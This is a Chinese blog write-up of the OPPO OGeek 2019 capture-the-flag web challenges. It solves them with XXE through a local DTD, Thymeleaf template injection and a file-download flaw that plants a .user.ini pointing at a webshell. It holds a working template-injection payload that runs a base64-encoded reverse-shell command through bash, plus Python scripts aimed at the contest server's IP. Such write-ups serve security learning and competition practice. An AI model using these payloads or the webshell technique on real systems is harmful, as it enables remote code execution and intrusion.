OPPO OGeek 2019 WEB

OPPO OGeek 2019 WEB

九月 08, 2019

OPPO OGeek 2019 WEB

由于一些原因,ogeek没打,听说质量还可以,开学来了闲得无聊碰巧环境没关,一边做一边复现一波

LookAround

1567412831533

好像是个xml,抓个包试试

1567413147563

尝试xxe

1567413106902

尝试了下发现没有回显

https://xz.aliyun.com/t/3357#toc-8

尝试加载外部DTD 发现没有外网

那就看看能不能利用本地DTD

https://www.freebuf.com/articles/web/195899.html

由于没有回显只能fuzz(其实题目说了 build from tomcat:8-jre8),也可以pull一个去找LOCAL DTD

https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation

1567413740413

发现有fonts.dtd

使用资料里的第一个payload

1567414135922

render

1567414322110

随意测试一下,发现错误页面是 Spring boot 的

题目名是render,猜测考点是ssti

开始fuzz

1567414944801

1567414991653

发现成功,thymeleaf的SSTI

https://dotblogs.com.tw/cylcode/2018/09/21/170510

读取flag1567415146083

这里附上看到的别的payload

{"content":"<p th:text=\"${#ctx.getClass().getClass().forName(&quot;java.lang.Runtime&quot;).getRuntime().exec(&quot;bash -c {echo,xxxxxxxxx==}|{base64,-d}|{bash,-i}&quot;).toString()}\"></p>"}

xxxxxxxxx== 换上自己反弹shell的命令

enjoy your self

<?php

error_reporting(0);

include "../../utils/utils.php";

if(isset($_REQUEST['filename'])  and preg_match("/^\w{8}$/", $_REQUEST['filename'])){
    $filename = strtolower($_REQUEST['filename']);
    touch("backup/{$filename}.txt");
    unlink(glob("backup/*")[0]);
}
else{
    highlight_file(__FILE__);
}

?>

简单分析一下,正则匹配文件名,8次[^a-zA-Z0-9_]

创建该文件,然后删除第一个文件

这里很奇怪于为啥只删除匹配到的第一个文件

猜测backup目录下存在某个不会被删除的文件

fuzz文件名

#coding:utf-8
import requests
import string

filename = ""
dicts = string.digits+string.lowercase

# print dicts
cc = 7

url = 'http://47.107.255.20:18088/users/bc6b3f008512160e7139eca8afc23363/'

for i in xrange(8):
    for _ in dicts:
        temp = filename + _ +"z" * cc
        print "test------------>"+temp
        requests.get(url+'?filename='+temp)# 写文本

        res = requests.get(url+'backup/'+temp+'.txt')

        if res.status_code == 200:
            print temp
            filename = filename + _
            cc -= 1
            break

会断在aefebab8,访问/backup/aefebab8.txt

<!-- src/8a66c58a168c9dc0fb622365cbe340fc.php -->

<?php
include "../utils/utils.php";

$sandbox = Get_Sandbox();

if(isset($_REQUEST['method'])){
    $method = $_REQUEST['method'];

    if($method == 'info'){
        phpinfo();
    }elseif($method == 'download' and isset($_REQUEST['url'])){
        $url = $_REQUEST['url'];
        $url_parse = parse_url($url);

        if(!isset($url_parse['scheme']) or $url_parse['scheme'] != 'http' or !isset($url_parse['host']) or $url_parse['host'] == ""){
            die("something wrong");
        }

        $path_info = pathinfo($url);

        if(strpos($path_info['filename'], ".") !== false){
            die("something wrong");
        }

        if(!Check_Ext($path_info['extension'])){
            die("something wrong");
        }

        $response = GetFileInfoFromHeader($url);

        $save_dir = "../users/${sandbox}/uploads/{$response['type']}/";

        if(is_dir(dirname($save_dir)) and !is_dir($save_dir)){
            mkdir($save_dir, 0755);
        }

        $save_path = "{$save_dir}{$path_info['filename']}.{$response['ext']}";
        echo "/uploads/{$response['type']}/{$path_info['filename']}.{$response['ext']}";

        if(!is_dir($save_path)){
            file_put_contents($save_path, $response['content']);
        }
    }
}

这边info下给了phpinfo

phpinfo给了网站根目录,disable_function也ban了一堆

有个远程文件下载,但是只能下载jpg,png等图片格式的文件到本地

$response的值是从远程服务器response header中的Content-Type 获取

主要思路就是控制content-type头,往/var/www/html/users/写.user.ini,内容是auto_prepend_file,包含一个一句话webshell,然后访问/users/下的php文件

import requests

while True:

    print(requests.get("http://47.107.255.20:18088/src/8a66c58a168c9dc0fb622365cbe340fc.php?method=download&url=http://xxxxxxxxx/.png").text)

    r = requests.post("http://47.107.255.20:18088/users/64b066ab932af940f9e5d242bf9bf777/", data={"cmd": "phpinfo();"})

    print(r.status_code)

    if r.status_code != 404:

        print(r.text)

        exit(0)

本文作者: Char0n
本文地址: http://charon.xin/2019/09/08/OPPO-OGeek-2019-WEB/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 3.0 CN 许可协议。转载请注明出处!